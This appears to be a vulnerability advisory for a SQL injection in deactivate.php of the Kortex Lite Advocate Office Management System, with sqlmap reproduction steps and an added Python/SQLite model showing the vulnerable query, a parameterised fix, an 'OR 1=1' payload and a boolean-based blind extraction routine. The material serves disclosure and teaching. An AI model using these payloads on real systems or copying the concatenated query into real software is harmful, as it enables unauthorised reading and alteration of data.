SourceCodester Kortex Lite Advocate Office Management System SQL Injection Vulnerability in deactivate.php

Vulnerability

A SQL injection vulnerability rated critical has been reported in SourceCodester Kortex Lite Advocate Office Management System version 1.0. The flaw is in deactivate.php, which takes the value of the 'id' request parameter and uses it in a SQL statement without adequately validating it or binding it as a query parameter. An attacker who can reach that file can therefore append SQL of their own to the query and use it to read or alter data in the application's database. The vulnerability is exploitable remotely, and exploit details have been published.

Impact

An attacker who exploits this vulnerability can have SQL of their own choosing executed by the back-end database. Depending on the injected statement, that means reading, modifying or deleting application data, including records the attacker is not authorized to see. Because deactivate.php performs a write, a successful injection can also alter or deactivate records beyond the single one the request was meant to target. If the application's database account holds elevated privileges such as DBA rights, the same access may be leveraged further against the host running the database server.

Reproduction

To reproduce, send an HTTP request to deactivate.php with a SQL injection payload in the 'id' parameter and check whether the response, or the resulting database state, depends on the condition you injected. sqlmap automates this step: pointed at the URL with the 'id' parameter selected for testing, it identifies the injection technique that works and can then enumerate and extract database contents, which demonstrates the impact described above. Since deactivate.php writes to the database, every probe may change records, so reproduce only against a test copy of the application and its data.
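The following is an added example written for this page, not code from the Kortex Lite project, whose deactivate.php is PHP backed by MySQL. It models the flaw described in the Vulnerability and Reproduction sections in Python against an in-memory SQLite database so it can be run offline: a deactivation query built by string concatenation from the 'id' parameter, the same query with the value bound as a parameter, and a boolean-based blind extraction that uses only the injectable parameter and the affected-row count as a true/false oracle (the kind of inference sqlmap automates). The table name, columns and rows are constructed for the demonstration and are not the application's real schema.

```python
"""Model of an injectable 'id' parameter in a deactivation endpoint.

Added example, not the project's code. The real application is PHP/MySQL;
the pattern is reproduced here with Python's sqlite3 so it runs offline.
The 'advocates' table, its columns and rows are constructed sample data.
"""
import sqlite3

CHARSET = "abcdefghijklmnopqrstuvwxyz"


def make_db() -> sqlite3.Connection:
    """Create the constructed 'advocates' table with three active rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE advocates (id INTEGER PRIMARY KEY, name TEXT, status INTEGER)"
    )
    conn.executemany(
        "INSERT INTO advocates (id, name, status) VALUES (?, ?, ?)",
        [(1, "alice", 1), (2, "bob", 1), (3, "carol", 1)],
    )
    conn.commit()
    return conn


def active_count(conn: sqlite3.Connection) -> int:
    """Number of rows still marked active (status = 1)."""
    return conn.execute("SELECT COUNT(*) FROM advocates WHERE status = 1").fetchone()[0]


def deactivate_vulnerable(conn: sqlite3.Connection, id_param: str) -> int:
    """Vulnerable pattern: the raw request value is concatenated into the SQL
    text, so anything placed in ?id= becomes part of the statement.
    Returns the number of rows the UPDATE matched."""
    sql = "UPDATE advocates SET status = 0 WHERE id = " + id_param
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def deactivate_fixed(conn: sqlite3.Connection, id_param: str) -> int:
    """Hardened form: reject anything that is not an integer, then bind the
    value as a query parameter (the equivalent of a mysqli/PDO prepared
    statement in PHP) so the database never parses it as SQL."""
    if not id_param.isdigit():
        raise ValueError("id must be a positive integer")
    cur = conn.execute(
        "UPDATE advocates SET status = 0 WHERE id = ?", (int(id_param),)
    )
    conn.commit()
    return cur.rowcount


def blind_extract_name(conn: sqlite3.Connection, target_id: int, max_len: int = 16) -> str:
    """Boolean-based blind extraction through the vulnerable endpoint.

    Each probe injects 'id=1 AND substr(<other row's name>, pos, 1) = ch'.
    The UPDATE matches row 1 only when the condition is true, so the matched
    row count is the oracle: 1 means the guessed character is correct.
    The assumed charset is lowercase letters, matching the sample data."""
    recovered = ""
    for pos in range(1, max_len + 1):
        found = None
        for ch in CHARSET:
            payload = (
                "1 AND substr((SELECT name FROM advocates WHERE id="
                f"{target_id}),{pos},1)='{ch}'"
            )
            if deactivate_vulnerable(conn, payload) == 1:
                found = ch
                break
        if found is None:  # substr returned '' past the end of the name
            break
        recovered += found
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("active before:", active_count(db))
    print("rows hit by id=1 OR 1=1:", deactivate_vulnerable(db, "1 OR 1=1"))
    print("active after:", active_count(db))
    print("name of row 2 via blind injection:", blind_extract_name(make_db(), 2))
```

The `1 OR 1=1` payload shows the write-side impact (every row is deactivated by a request that should have touched one), while `blind_extract_name` shows the read-side impact the advisory describes: data from rows the request never named is recovered one character at a time without any error message or output beyond the row count. Against the real application the oracle would be a difference in the HTTP response or in the resulting record state rather than a Python return value, which is exactly what sqlmap's boolean-based technique measures.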

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm
spread: 0.3
impact: 2.5
exploitability: 6.2
remediation: 0.0
relevance: 0.0
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.